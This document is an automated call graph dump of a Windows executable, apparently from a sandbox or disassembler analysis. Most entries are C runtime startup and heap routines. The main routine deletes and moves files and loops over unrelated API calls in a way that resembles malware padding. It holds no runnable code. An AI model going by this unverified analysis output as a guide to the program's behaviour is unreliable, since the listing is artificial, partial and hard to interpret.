LeaveCriticalSection 6403->6409 6405 406b37 6405->6394 6410 408120 LeaveCriticalSection 6406->6410 6408 406b7c 6408->6400 6409->6405 6410->6408 6642 404135 6645 403dcd 6642->6645 6644 404148 ctype 6650 403d3b 6645->6650 6648 4042db 6648->6644 6649 404e94 __setmbcp 65 API calls 6649->6648 6651 403b71 std::_String_base::_Xlen 65 API calls 6650->6651 6652 403d44 6651->6652 6652->6648 6652->6649 6746 403cb6 6747 403b13 std::bad_exception::bad_exception 73 API calls 6746->6747 6748 403ccd 6747->6748 6707 404bf7 6710 407ee2 6707->6710 6709 404bfc 6709->6709 6711 407f14 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 6710->6711 6712 407f07 6710->6712 6713 407f0b 6711->6713 6712->6711 6712->6713 6713->6709 6714 402ef8 6715 402f40 6714->6715 6716 4041fa std::exception::exception 65 API calls 6715->6716 6717 402f4f 6716->6717 6749 404bb8 6750 404bc7 6749->6750 6751 404bcd 6749->6751 6752 407382 _raise 65 API calls 6750->6752 6755 4073a7 6751->6755 6752->6751 6754 404bd2 __setmbcp 6756 407240 _doexit 65 API calls 6755->6756 6757 4073b2 6756->6757 6757->6754 4873 404a79 4912 406e94 4873->4912 4875 404a85 GetStartupInfoA 4876 404aa8 4875->4876 4913 407eb2 HeapCreate 4876->4913 4879 404af8 4915 406ba3 GetModuleHandleW 4879->4915 4883 404b09 __RTC_Initialize 4949 407c12 4883->4949 4884 404a50 _fast_error_exit 65 API calls 4884->4883 4886 404b17 4887 404b23 GetCommandLineA 4886->4887 5051 4070fc 4886->5051 4964 407adb 4887->4964 4894 404b48 5000 4077a8 4894->5000 4895 4070fc __amsg_exit 65 API calls 4895->4894 4898 404b59 5015 4071bb 4898->5015 4899 4070fc __amsg_exit 65 API calls 4899->4898 4901 404b60 4902 404b6b 4901->4902 4903 4070fc __amsg_exit 65 API calls 4901->4903 5021 407749 4902->5021 4903->4902 4908 404b9a 5061 407398 4908->5061 4911 404b9f __setmbcp 4912->4875 4914 404aec 4913->4914 4914->4879 5043 404a50 4914->5043 4916 406bb7 4915->4916 4917 406bbe 4915->4917 4918 4070cc __crt_waiting_on_module_handle 2 API calls 4916->4918 4919 406d26 4917->4919 4920 406bc8 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4917->4920 4922 406bbd 4918->4922 5107 4068bd 4919->5107 4923 406c11 TlsAlloc 4920->4923 4922->4917 4925 404afe 4923->4925 4926 406c5f TlsSetValue 4923->4926 4925->4883 4925->4884 4926->4925 4927 406c70 4926->4927 5064 4073b6 4927->5064 4930 406793 __encode_pointer 6 API calls 4931 406c80 4930->4931 4932 406793 __encode_pointer 6 API calls 4931->4932 4933 406c90 4932->4933 4934 406793 __encode_pointer 6 API calls 4933->4934 4935 406ca0 4934->4935 4936 406793 __encode_pointer 6 API calls 4935->4936 4937 406cb0 4936->4937 5071 40807e 4937->5071 4944 40680e __decode_pointer 5 API calls 4945 406d04 4944->4945 4945->4919 4946 406d0b 4945->4946 5089 4068fa 4946->5089 4948 406d13 GetCurrentThreadId 4948->4925 5439 406e94 4949->5439 4951 407c1e GetStartupInfoA 4952 4091a3 __calloc_crt 65 API calls 4951->4952 4958 407c3f 4952->4958 4953 407e5d __setmbcp 4953->4886 4954 407dda GetStdHandle 4959 407da4 4954->4959 4955 4091a3 __calloc_crt 65 API calls 4955->4958 4956 407e3f SetHandleCount 4956->4953 4957 407dec GetFileType 4957->4959 4958->4953 4958->4955 4958->4959 4961 407d27 4958->4961 4959->4953 4959->4954 4959->4956 4959->4957 4962 40a26b __ioinit InitializeCriticalSectionAndSpinCount 4959->4962 4960 407d50 GetFileType 4960->4961 4961->4953 4961->4959 4961->4960 4963 40a26b __ioinit InitializeCriticalSectionAndSpinCount 4961->4963 4962->4959 4963->4961 4965 407b18 4964->4965 4966 407af9 GetEnvironmentStringsW 4964->4966 4967 407b01 4965->4967 4970 407bb1 4965->4970 4966->4967 4968 407b0d GetLastError 4966->4968 4969 407b34 GetEnvironmentStringsW 4967->4969 4975 407b43 4967->4975 4968->4965 4972 404b33 4969->4972 4969->4975 4971 407bba GetEnvironmentStrings 4970->4971 4970->4972 4971->4972 4973 407bca 4971->4973 4989 407a20 4972->4989 4978 40915e __malloc_crt 65 API calls 4973->4978 4974 407b58 WideCharToMultiByte 4976 407ba6 FreeEnvironmentStringsW 4974->4976 4977 407b77 4974->4977 4975->4974 4975->4975 4976->4972 4979 40915e __malloc_crt 65 API calls 4977->4979 4980 407be4 4978->4980 4981 407b7d 4979->4981 4982 407bf7 _realloc 4980->4982 4983 407beb FreeEnvironmentStringsA 4980->4983 4981->4976 4984 407b85 WideCharToMultiByte 4981->4984 4987 407c01 FreeEnvironmentStringsA 4982->4987 4983->4972 4985 407b9f 4984->4985 4986 407b97 4984->4986 4985->4976 4988 404e94 __setmbcp 65 API calls 4986->4988 4987->4972 4988->4985 4990 407a35 4989->4990 4991 407a3a GetModuleFileNameA 4989->4991 5446 409d63 4990->5446 4993 407a61 4991->4993 5440 407886 4993->5440 4996 40915e __malloc_crt 65 API calls 4997 407aa3 4996->4997 4998 407886 _parse_cmdline 75 API calls 4997->4998 4999 404b3d 4997->4999 4998->4999 4999->4894 4999->4895 5001 4077b1 5000->5001 5004 4077b6 _strlen 5000->5004 5002 409d63 ___initmbctable 109 API calls 5001->5002 5002->5004 5003 4091a3 __calloc_crt 65 API calls 5009 4077eb _strlen 5003->5009 5004->5003 5007 404b4e 5004->5007 5005 407849 5006 404e94 __setmbcp 65 API calls 5005->5006 5006->5007 5007->4898 5007->4899 5008 4091a3 __calloc_crt 65 API calls 5008->5009 5009->5005 5009->5007 5009->5008 5010 40786f 5009->5010 5012 404d13 _strcpy_s 65 API calls 5009->5012 5013 407830 5009->5013 5011 404e94 __setmbcp 65 API calls 5010->5011 5011->5007 5012->5009 5013->5009 5014 405424 __invoke_watson 10 API calls 5013->5014 5014->5013 5017 4071c9 __IsNonwritableInCurrentImage 5015->5017 5857 40a21d 5017->5857 5018 4071e7 __initterm_e 5020 407206 __IsNonwritableInCurrentImage __initterm 5018->5020 5861 405a8c 5018->5861 5020->4901 5022 407757 5021->5022 5025 40775c 5021->5025 5023 409d63 ___initmbctable 109 API calls 5022->5023 5023->5025 5024 404b71 5027 40387c 5024->5027 5025->5024 5026 40a5fb __wincmdln 75 API calls 5025->5026 5026->5025 5028 40388f 5027->5028 5032 4038bd 5027->5032 5989 404a17 DeleteFileA 5028->5989 5030 403895 5995 4049e4 MoveFileA 5030->5995 5031 4038d2 SetFilePointer HeapWalk GetMailslotInfo GetProcessPriorityBoost 5031->5032 5032->5031 5034 403915 5032->5034 5961 4034aa 5034->5961 5035 40389c 6001 4040cd 5035->6001 5038 40391a 5038->4908 5058 40736c 5038->5058 5040 4038b0 SetConsoleMode 5041 4038b8 5040->5041 6007 40494f 5041->6007 5044 404a63 5043->5044 5045 404a5e 5043->5045 5047 407404 __NMSG_WRITE 65 API calls 5044->5047 5046 4075af __FF_MSGBANNER 65 API calls 5045->5046 5046->5044 5048 404a6b 5047->5048 5049 407150 _fast_error_exit 2 API calls 5048->5049 5050 404a75 5049->5050 5050->4879 5052 4075af __FF_MSGBANNER 65 API calls 5051->5052 5053 407106 5052->5053 5054 407404 __NMSG_WRITE 65 API calls 5053->5054 5055 40710e 5054->5055 5056 40680e __decode_pointer 5 API calls 5055->5056 5057 404b22 5056->5057 5057->4887 5059 407240 _doexit 65 API calls 5058->5059 5060 40737d 5059->5060 5060->4908 5062 407240 _doexit 65 API calls 5061->5062 5063 4073a3 5062->5063 5063->4911 5118 406805 5064->5118 5066 4073be __init_pointers __initp_misc_winsig 5121 4049d3 5066->5121 5069 406793 __encode_pointer 6 API calls 5070 406c75 5069->5070 5070->4930 5072 408089 5071->5072 5073 406cbd 5072->5073 5124 40a26b 5072->5124 5073->4919 5075 40680e TlsGetValue 5073->5075 5076 406826 5075->5076 5077 406847 GetModuleHandleW 5075->5077 5076->5077 5079 406830 TlsGetValue 5076->5079 5078 406857 5077->5078 5082 40683f 5077->5082 5080 4070cc __crt_waiting_on_module_handle 2 API calls 5078->5080 5081 40683b 5079->5081 5080->5082 5081->5077 5081->5082 5082->4919 5083 4091a3 5082->5083 5085 4091ac 5083->5085 5086 406cea 5085->5086 5087 4091ca Sleep 5085->5087 5129 40a70a 5085->5129 5086->4919 5086->4944 5088 4091df 5087->5088 5088->5085 5088->5086 5418 406e94 5089->5418 5091 406906 GetModuleHandleW 5092 406916 5091->5092 5093 40691c 5091->5093 5094 4070cc __crt_waiting_on_module_handle 2 API calls 5092->5094 5095 406934 GetProcAddress GetProcAddress 5093->5095 5096 406958 5093->5096 5094->5093 5095->5096 5097 4081fa __lock 61 API calls 5096->5097 5098 406977 InterlockedIncrement 5097->5098 5419 4069cf 5098->5419 5101 4081fa __lock 61 API calls 5102 406998 5101->5102 5422 40943b InterlockedIncrement 5102->5422 5104 4069b6 5434 4069d8 5104->5434 5106 4069c3 __setmbcp 5106->4948 5108 4068c7 5107->5108 5109 4068d3 5107->5109 5110 40680e __decode_pointer 5 API calls 5108->5110 5111 4068e7 TlsFree 5109->5111 5112 4068f5 5109->5112 5110->5109 5111->5112 5113 4080e5 DeleteCriticalSection 5112->5113 5115 4080fd 5112->5115 5114 404e94 __setmbcp 65 API calls 5113->5114 5114->5112 5116 40810f DeleteCriticalSection 5115->5116 5117 40811d 5115->5117 5116->5115 5117->4925 5119 406793 __encode_pointer 6 API calls 5118->5119 5120 40680c 5119->5120 5120->5066 5122 406793 __encode_pointer 6 API calls 5121->5122 5123 4049dd 5122->5123 5123->5069 5128 406e94 5124->5128 5126 40a277 InitializeCriticalSectionAndSpinCount 5127 40a2bb __setmbcp 5126->5127 5127->5072 5128->5126 5130 40a716 __setmbcp 5129->5130 5131 40a72e 5130->5131 5141 40a74d _memset 5130->5141 5142 4055b4 5131->5142 5134 40a7bf RtlAllocateHeap 5134->5141 5138 40a743 __setmbcp 5138->5085 5141->5134 5141->5138 5148 4081fa 5141->5148 5155 408a0c 5141->5155 5161 40a806 5141->5161 5164 405ab2 5141->5164 5167 4069e1 GetLastError 5142->5167 5144 4055b9 5145 40554c 5144->5145 5146 40680e __decode_pointer 5 API calls 5145->5146 5147 40555c __invoke_watson 5146->5147 5149 408222 EnterCriticalSection 5148->5149 5150 40820f 5148->5150 5149->5141 5214 408137 5150->5214 5152 408215 5152->5149 5153 4070fc __amsg_exit 64 API calls 5152->5153 5154 408221 5153->5154 5154->5149 5158 408a3a 5155->5158 5156 408ad3 5160 408adc 5156->5160 5413 408623 5156->5413 5158->5156 5158->5160 5406 408573 5158->5406 5160->5141 5417 408120 LeaveCriticalSection 5161->5417 5163 40a80d 5163->5141 5165 40680e __decode_pointer 5 API calls 5164->5165 5166 405ac2 5165->5166 5166->5141 5181 406889 TlsGetValue 5167->5181 5170 406a4e SetLastError 5170->5144 5171 4091a3 __calloc_crt 62 API calls 5172 406a0c 5171->5172 5172->5170 5173 40680e __decode_pointer 5 API calls 5172->5173 5174 406a26 5173->5174 5175 406a45 5174->5175 5176 406a2d 5174->5176 5186 404e94 5175->5186 5177 4068fa __getptd_noexit 62 API calls 5176->5177 5179 406a35 GetCurrentThreadId 5177->5179 5179->5170 5180 406a4b 5180->5170 5182 4068b9 5181->5182 5183 40689e 5181->5183 5182->5170 5182->5171 5184 40680e __decode_pointer 5 API calls 5183->5184 5185 4068a9 TlsSetValue 5184->5185 5185->5182 5187 404ea0 __setmbcp 5186->5187 5188 404edf 5187->5188 5189 404f19 _realloc __setmbcp 5187->5189 5191 4081fa __lock 63 API calls 5187->5191 5188->5189 5190 404ef4 HeapFree 5188->5190 5189->5180 5190->5189 5192 404f06 5190->5192 5195 404eb7 ___sbh_find_block 5191->5195 5193 4055b4 __setmbcp 63 API calls 5192->5193 5194 404f0b GetLastError 5193->5194 5194->5189 5198 404ed1 5195->5198 5199 40825d 5195->5199 5206 404eea 5198->5206 5200 40829c 5199->5200 5205 40853e 5199->5205 5201 408488 VirtualFree 5200->5201 5200->5205 5202 4084ec 5201->5202 5203 4084fb VirtualFree HeapFree 5202->5203 5202->5205 5209 405600 5203->5209 5205->5198 5213 408120 LeaveCriticalSection 5206->5213 5208 404ef1 5208->5188 5210 405618 5209->5210 5211 40563f __VEC_memcpy 5210->5211 5212 405647 5210->5212 5211->5212 5212->5205 5213->5208 5215 408143 __setmbcp 5214->5215 5216 408169 5215->5216 5240 4075af 5215->5240 5224 408179 __setmbcp 5216->5224 5286 40915e 5216->5286 5222 40819a 5227 4081fa __lock 65 API calls 5222->5227 5223 40818b 5226 4055b4 __setmbcp 65 API calls 5223->5226 5224->5152 5226->5224 5229 4081a1 5227->5229 5230 4081d5 5229->5230 5231 4081a9 5229->5231 5232 404e94 __setmbcp 65 API calls 5230->5232 5233 40a26b __ioinit InitializeCriticalSectionAndSpinCount 5231->5233 5234 4081c6 5232->5234 5235 4081b4 5233->5235 5292 4081f1 5234->5292 5235->5234 5237 404e94 __setmbcp 65 API calls 5235->5237 5238 4081c0 5237->5238 5239 4055b4 __setmbcp 65 API calls 5238->5239 5239->5234 5295 40a55d 5240->5295 5243 40a55d __set_error_mode 65 API calls 5245 4075c3 5243->5245 5244 407404 __NMSG_WRITE 65 API calls 5246 4075db 5244->5246 5245->5244 5247 4075e5 5245->5247 5248 407404 __NMSG_WRITE 65 API calls 5246->5248 5249 407404 5247->5249 5248->5247 5250 407418 5249->5250 5251 407573 5250->5251 5252 40a55d __set_error_mode 62 API calls 5250->5252 5283 407150 5251->5283 5253 40743a 5252->5253 5254 407578 GetStdHandle 5253->5254 5255 40a55d __set_error_mode 62 API calls 5253->5255 5254->5251 5256 407586 _strlen 5254->5256 5257 40744b 5255->5257 5256->5251 5259 40759f WriteFile 5256->5259 5257->5254 5258 40745d 5257->5258 5258->5251 5301 404d13 5258->5301 5259->5251 5262 407493 GetModuleFileNameA 5264 4074b1 5262->5264 5268 4074d4 _strlen 5262->5268 5266 404d13 _strcpy_s 62 API calls 5264->5266 5267 4074c1 5266->5267 5267->5268 5270 405424 __invoke_watson 10 API calls 5267->5270 5269 407517 5268->5269 5317 40a4a8 5268->5317 5326 40a434 5269->5326 5270->5268 5274 40753b 5277 40a434 _strcat_s 62 API calls 5274->5277 5276 405424 __invoke_watson 10 API calls 5276->5274 5278 40754f 5277->5278 5280 407560 5278->5280 5281 405424 __invoke_watson 10 API calls 5278->5281 5279 405424 __invoke_watson 10 API calls 5279->5269 5335 40a2cb 5280->5335 5281->5280 5373 407125 GetModuleHandleW 5283->5373 5288 409167 5286->5288 5289 408184 5288->5289 5290 40917e Sleep 5288->5290 5375 404dca 5288->5375 5289->5222 5289->5223 5291 409193 5290->5291 5291->5288 5291->5289 5405 408120 LeaveCriticalSection 5292->5405 5294 4081f8 5294->5224 5296 40a56c 5295->5296 5297 4075b6 5296->5297 5298 4055b4 __setmbcp 65 API calls 5296->5298 5297->5243 5297->5245 5299 40a58f 5298->5299 5300 40554c __calloc_impl 5 API calls 5299->5300 5300->5297 5302 404d24 5301->5302 5303 404d2b 5301->5303 5302->5303 5308 404d51 5302->5308 5304 4055b4 __setmbcp 65 API calls 5303->5304 5305 404d30 5304->5305 5306 40554c __calloc_impl 5 API calls 5305->5306 5307 404d3f 5306->5307 5307->5262 5310 405424 5307->5310 5308->5307 5309 4055b4 __setmbcp 65 API calls 5308->5309 5309->5305 5362 405030 5310->5362 5312 405451 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5313 40552d GetCurrentProcess TerminateProcess 5312->5313 5316 405521 __invoke_watson 5312->5316 5364 404c9b 5313->5364 5315 40554a 5315->5262 5316->5313 5318 40a4ba 5317->5318 5321 40a4be 5318->5321 5323 407504 5318->5323 5324 40a504 5318->5324 5319 4055b4 __setmbcp 65 API calls 5320 40a4da 5319->5320 5322 40554c __calloc_impl 5 API calls 5320->5322 5321->5319 5321->5323 5322->5323 5323->5269 5323->5279 5324->5323 5325 4055b4 __setmbcp 65 API calls 5324->5325 5325->5320 5327 40a44c 5326->5327 5330 40a445 5326->5330 5328 4055b4 __setmbcp 65 API calls 5327->5328 5329 40a451 5328->5329 5331 40554c __calloc_impl 5 API calls 5329->5331 5330->5327 5333 40a480 5330->5333 5332 40752a 5331->5332 5332->5274 5332->5276 5333->5332 5334 4055b4 __setmbcp 65 API calls 5333->5334 5334->5329 5336 406805 FindHandlerForForeignException 6 API calls 5335->5336 5337 40a2db 5336->5337 5338 40a2ee LoadLibraryA 5337->5338 5339 40a376 5337->5339 5340 40a303 GetProcAddress 5338->5340 5341 40a418 5338->5341 5347 40680e __decode_pointer 5 API calls 5339->5347 5354 40a3a0 5339->5354 5340->5341 5342 40a319 5340->5342 5341->5251 5344 406793 __encode_pointer 6 API calls 5342->5344 5343 40a3cb 5345 40680e __decode_pointer 5 API calls 5343->5345 5349 40a31f GetProcAddress 5344->5349 5345->5341 5346 40680e __decode_pointer 5 API calls 5356 40a3e3 5346->5356 5348 40a393 5347->5348 5350 40680e __decode_pointer 5 API calls 5348->5350 5351 406793 __encode_pointer 6 API calls 5349->5351 5350->5354 5352 40a334 GetProcAddress 5351->5352 5353 406793 __encode_pointer 6 API calls 5352->5353 5355 40a349 GetProcAddress 5353->5355 5354->5343 5354->5346 5357 406793 __encode_pointer 6 API calls 5355->5357 5356->5343 5358 40680e __decode_pointer 5 API calls 5356->5358 5359 40a35e 5357->5359 5358->5343 5359->5339 5360 40a368 GetProcAddress 5359->5360 5361 406793 __encode_pointer 6 API calls 5360->5361 5361->5339 5363 40503c __VEC_memzero 5362->5363 5363->5312 5365 404ca3 5364->5365 5366 404ca5 IsDebuggerPresent 5364->5366 5365->5315 5372 409156 5366->5372 5369 408045 SetUnhandledExceptionFilter UnhandledExceptionFilter 5370 40806a GetCurrentProcess TerminateProcess 5369->5370 5371 408062 __invoke_watson 5369->5371 5370->5315 5371->5370 5372->5369 5374 407139 ExitProcess 5373->5374 5376 404e7d 5375->5376 5390 404ddc 5375->5390 5377 405ab2 __calloc_impl 5 API calls 5376->5377 5378 404e83 5377->5378 5381 4055b4 __setmbcp 64 API calls 5378->5381 5379 404ded 5380 4075af __FF_MSGBANNER 64 API calls 5379->5380 5382 407404 __NMSG_WRITE 64 API calls 5379->5382 5386 407150 _fast_error_exit 2 API calls 5379->5386 5379->5390 5380->5379 5383 404e75 5381->5383 5382->5379 5383->5288 5385 404e39 RtlAllocateHeap 5385->5390 5386->5379 5387 404e69 5389 4055b4 __setmbcp 64 API calls 5387->5389 5388 405ab2 __calloc_impl 5 API calls 5388->5390 5391 404e6e 5389->5391 5390->5379 5390->5383 5390->5385 5390->5387 5390->5388 5390->5391 5393 404d7b 5390->5393 5392 4055b4 __setmbcp 64 API calls 5391->5392 5392->5383 5394 404d87 __setmbcp 5393->5394 5395 404db8 __setmbcp 5394->5395 5396 4081fa __lock 65 API calls 5394->5396 5395->5390 5397 404d9d 5396->5397 5398 408a0c ___sbh_alloc_block 5 API calls 5397->5398 5399 404da8 5398->5399 5401 404dc1 5399->5401 5404 408120 LeaveCriticalSection 5401->5404 5403 404dc8 5403->5395 5404->5403 5405->5294 5407 408586 HeapReAlloc 5406->5407 5408 4085ba HeapAlloc 5406->5408 5409 4085a4 5407->5409 5410 4085a8 5407->5410 5408->5409 5411 4085dd VirtualAlloc 5408->5411 5409->5156 5410->5408 5411->5409 5412 4085f7 HeapFree 5411->5412 5412->5409 5414 40863a VirtualAlloc 5413->5414 5416 408681 5414->5416 5416->5160 5417->5163 5418->5091 5437 408120 LeaveCriticalSection 5419->5437 5421 406991 5421->5101 5423 409459 InterlockedIncrement 5422->5423 5424 40945c 5422->5424 5423->5424 5425 409466 InterlockedIncrement 5424->5425 5426 409469 5424->5426 5425->5426 5427 409473 InterlockedIncrement 5426->5427 5428 409476 5426->5428 5427->5428 5429 409480 InterlockedIncrement 5428->5429 5430 409483 5428->5430 5429->5430 5431 40949c InterlockedIncrement 5430->5431 5432 4094ac InterlockedIncrement 5430->5432 5433 4094b7 InterlockedIncrement 5430->5433 5431->5430 5432->5430 5433->5104 5438 408120 LeaveCriticalSection 5434->5438 5436 4069df 5436->5106 5437->5421 5438->5436 5439->4951 5442 4078a5 5440->5442 5444 407912 5442->5444 5450 40a5fb 5442->5450 5443 407a10 5443->4996 5443->4999 5444->5443 5445 40a5fb 75 API calls __wincmdln 5444->5445 5445->5444 5447 409d6c 5446->5447 5448 409d73 5446->5448 5672 409bc9 5447->5672 5448->4991 5453 40a5a8 5450->5453 5456 4098e1 5453->5456 5457 4098f4 5456->5457 5461 409941 5456->5461 5464 406a5a 5457->5464 5460 409921 5460->5461 5484 40983d 5460->5484 5461->5442 5465 4069e1 __getptd_noexit 65 API calls 5464->5465 5466 406a62 5465->5466 5467 406a6f 5466->5467 5468 4070fc __amsg_exit 65 API calls 5466->5468 5467->5460 5469 4095a1 5467->5469 5468->5467 5470 4095ad __setmbcp 5469->5470 5471 406a5a __getptd 65 API calls 5470->5471 5472 4095b2 5471->5472 5473 4095e0 5472->5473 5475 4095c4 5472->5475 5474 4081fa __lock 65 API calls 5473->5474 5476 4095e7 5474->5476 5477 406a5a __getptd 65 API calls 5475->5477 5500 409563 5476->5500 5482 4095c9 5477->5482 5481 4070fc __amsg_exit 65 API calls 5483 4095d7 __setmbcp 5481->5483 5482->5481 5482->5483 5483->5460 5485 409849 __setmbcp 5484->5485 5486 406a5a __getptd 65 API calls 5485->5486 5487 40984e 5486->5487 5488 4081fa __lock 65 API calls 5487->5488 5496 409860 5487->5496 5489 40987e 5488->5489 5490 4098c7 5489->5490 5491 409895 InterlockedDecrement 5489->5491 5492 4098af InterlockedIncrement 5489->5492 5668 4098d8 5490->5668 5491->5492 5495 4098a0 5491->5495 5492->5490 5494 4070fc __amsg_exit 65 API calls 5497 40986e __setmbcp 5494->5497 5495->5492 5498 404e94 __setmbcp 65 API calls 5495->5498 5496->5494 5496->5497 5497->5461 5499 4098ae 5498->5499 5499->5492 5501 409567 5500->5501 5502 409599 5500->5502 5501->5502 5503 40943b ___addlocaleref 8 API calls 5501->5503 5508 40960b 5502->5508 5504 40957a 5503->5504 5504->5502 5511 4094ca 5504->5511 5667 408120 LeaveCriticalSection 5508->5667 5510 409612 5510->5482 5512 4094db InterlockedDecrement 5511->5512 5513 40955e 5511->5513 5514 4094f0 InterlockedDecrement 5512->5514 5515 4094f3 5512->5515 5513->5502 5525 4092f2 5513->5525 5514->5515 5516 409500 5515->5516 5517 4094fd InterlockedDecrement 5515->5517 5518 40950a InterlockedDecrement 5516->5518 5519 40950d 5516->5519 5517->5516 5518->5519 5520 409517 InterlockedDecrement 5519->5520 5521 40951a 5519->5521 5520->5521 5522 409533 InterlockedDecrement 5521->5522 5523 409543 InterlockedDecrement 5521->5523 5524 40954e InterlockedDecrement 5521->5524 5522->5521 5523->5521 5524->5513 5526 409376 5525->5526 5528 409309 5525->5528 5527 404e94 __setmbcp 65 API calls 5526->5527 5529 4093c3 5526->5529 5530 409397 5527->5530 5528->5526 5535 40933d 5528->5535 5538 404e94 __setmbcp 65 API calls 5528->5538 5546 4093ea 5529->5546 5579 40aa43 5529->5579 5532 404e94 __setmbcp 65 API calls 5530->5532 5534 4093aa 5532->5534 5541 404e94 __setmbcp 65 API calls 5534->5541 5542 404e94 __setmbcp 65 API calls 5535->5542 5554 40935e 5535->5554 5536 404e94 __setmbcp 65 API calls 5543 40936b 5536->5543 5537 40942f 5544 404e94 __setmbcp 65 API calls 5537->5544 5545 409332 5538->5545 5539 404e94 __setmbcp 65 API calls 5539->5546 5540 404e94 65 API calls __setmbcp 5540->5546 5547 4093b8 5541->5547 5548 409353 5542->5548 5549 404e94 __setmbcp 65 API calls 5543->5549 5550 409435 5544->5550 5555 40ac1d 5545->5555 5546->5537 5546->5540 5552 404e94 __setmbcp 65 API calls 5547->5552 5571 40abd8 5548->5571 5549->5526 5550->5502 5552->5529 5554->5536 5556 40ac2a 5555->5556 5570 40aca7 5555->5570 5557 40ac3b 5556->5557 5558 404e94 __setmbcp 65 API calls 5556->5558 5559 40ac4d 5557->5559 5561 404e94 __setmbcp 65 API calls 5557->5561 5558->5557 5560 40ac5f 5559->5560 5562 404e94 __setmbcp 65 API calls 5559->5562 5563 404e94 __setmbcp 65 API calls 5560->5563 5564 40ac71 5560->5564 5561->5559 5562->5560 5563->5564 5565 404e94 __setmbcp 65 API calls 5564->5565 5567 40ac83 5564->5567 5565->5567 5566 40ac95 5569 404e94 __setmbcp 65 API calls 5566->5569 5566->5570 5567->5566 5568 404e94 __setmbcp 65 API calls 5567->5568 5568->5566 5569->5570 5570->5535 5572 40abe5 5571->5572 5573 40ac19 5571->5573 5574 40abf5 5572->5574 5576 404e94 __setmbcp 65 API calls 5572->5576 5573->5554 5575 40ac07 5574->5575 5577 404e94 __setmbcp 65 API calls 5574->5577 5575->5573 5578 404e94 __setmbcp 65 API calls 5575->5578 5576->5574 5577->5575 5578->5573 5580 40aa54 5579->5580 5581 4093e3 5579->5581 5582 404e94 __setmbcp 65 API calls 5580->5582 5581->5539 5583 40aa5c 5582->5583 5584 404e94 __setmbcp 65 API calls 5583->5584 5585 40aa64 5584->5585 5586 404e94 __setmbcp 65 API calls 5585->5586 5587 40aa6c 5586->5587 5588 404e94 __setmbcp 65 API calls 5587->5588 5589 40aa74 5588->5589 5590 404e94 __setmbcp 65 API calls 5589->5590 5591 40aa7c 5590->5591 5592 404e94 __setmbcp 65 API calls 5591->5592 5593 40aa84 5592->5593 5594 404e94 __setmbcp 65 API calls 5593->5594 5595 40aa8b 5594->5595 5596 404e94 __setmbcp 65 API calls 5595->5596 5597 40aa93 5596->5597 5598 404e94 __setmbcp 65 API calls 5597->5598 5599 40aa9b 5598->5599 5600 404e94 __setmbcp 65 API calls 5599->5600 5601 40aaa3 5600->5601 5602 404e94 __setmbcp 65 API calls 5601->5602 5603 40aaab 5602->5603 5604 404e94 __setmbcp 65 API calls 5603->5604 5605 40aab3 5604->5605 5606 404e94 __setmbcp 65 API calls 5605->5606 5607 40aabb 5606->5607 5608 404e94 __setmbcp 65 API calls 5607->5608 5609 40aac3 5608->5609 5610 404e94 __setmbcp 65 API calls 5609->5610 5611 40aacb 5610->5611 5612 404e94 __setmbcp 65 API calls 5611->5612 5613 40aad3 5612->5613 5614 404e94 __setmbcp 65 API calls 5613->5614 5615 40aade 5614->5615 5616 404e94 __setmbcp 65 API calls 5615->5616 5617 40aae6 5616->5617 5618 404e94 __setmbcp 65 API calls 5617->5618 5619 40aaee 5618->5619 5620 404e94 __setmbcp 65 API calls 5619->5620 5621 40aaf6 5620->5621 5622 404e94 __setmbcp 65 API calls 5621->5622 5623 40aafe 5622->5623 5624 404e94 __setmbcp 65 API calls 5623->5624 5625 40ab06 5624->5625 5626 404e94 __setmbcp 65 API calls 5625->5626 5627 40ab0e 5626->5627 5628 404e94 __setmbcp 65 API calls 5627->5628 5629 40ab16 5628->5629 5630 404e94 __setmbcp 65 API calls 5629->5630 5631 40ab1e 5630->5631 5632 404e94 __setmbcp 65 API calls 5631->5632 5633 40ab26 5632->5633 5634 404e94 __setmbcp 65 API calls 5633->5634 5635 40ab2e 5634->5635 5636 404e94 __setmbcp 65 API calls 5635->5636 5637 40ab36 5636->5637 5638 404e94 __setmbcp 65 API calls 5637->5638 5639 40ab3e 5638->5639 5640 404e94 __setmbcp 65 API calls 5639->5640 5641 40ab46 5640->5641 5642 404e94 __setmbcp 65 API calls 5641->5642 5643 40ab4e 5642->5643 5644 404e94 __setmbcp 65 API calls 5643->5644 5645 40ab56 5644->5645 5646 404e94 __setmbcp 65 API calls 5645->5646 5647 40ab64 5646->5647 5648 404e94 __setmbcp 65 API calls 5647->5648 5649 40ab6f 5648->5649 5650 404e94 __setmbcp 65 API calls 5649->5650 5651 40ab7a 5650->5651 5652 404e94 __setmbcp 65 API calls 5651->5652 5653 40ab85 5652->5653 5654 404e94 __setmbcp 65 API calls 5653->5654 5655 40ab90 5654->5655 5656 404e94 __setmbcp 65 API calls 5655->5656 5657 40ab9b 5656->5657 5658 404e94 __setmbcp 65 API calls 5657->5658 5659 40aba6 5658->5659 5660 404e94 __setmbcp 65 API calls 5659->5660 5661 40abb1 5660->5661 5662 404e94 __setmbcp 65 API calls 5661->5662 5663 40abbc 5662->5663 5664 404e94 __setmbcp 65 API calls 5663->5664 5665 40abc7 5664->5665 5666 404e94 __setmbcp 65 API calls 5665->5666 5666->5581 5667->5510 5671 408120 LeaveCriticalSection 5668->5671 5670 4098df 5670->5496 5671->5670 5673 409bd5 __setmbcp 5672->5673 5674 406a5a __getptd 65 API calls 5673->5674 5675 409bde 5674->5675 5676 40983d __setmbcp 67 API calls 5675->5676 5677 409be8 5676->5677 5703 409968 5677->5703 5680 40915e __malloc_crt 65 API calls 5681 409c09 5680->5681 5682 409d28 __setmbcp 5681->5682 5710 4099e4 5681->5710 5682->5448 5685 409d35 5685->5682 5690 409d48 5685->5690 5693 404e94 __setmbcp 65 API calls 5685->5693 5686 409c39 InterlockedDecrement 5687 409c49 5686->5687 5688 409c5a InterlockedIncrement 5686->5688 5687->5688 5692 404e94 __setmbcp 65 API calls 5687->5692 5688->5682 5689 409c70 5688->5689 5689->5682 5695 4081fa __lock 65 API calls 5689->5695 5691 4055b4 __setmbcp 65 API calls 5690->5691 5691->5682 5694 409c59 5692->5694 5693->5690 5694->5688 5697 409c84 InterlockedDecrement 5695->5697 5698 409d00 5697->5698 5699 409d13 InterlockedIncrement 5697->5699 5698->5699 5701 404e94 __setmbcp 65 API calls 5698->5701 5720 409d2a 5699->5720 5702 409d12 5701->5702 5702->5699 5704 4098e1 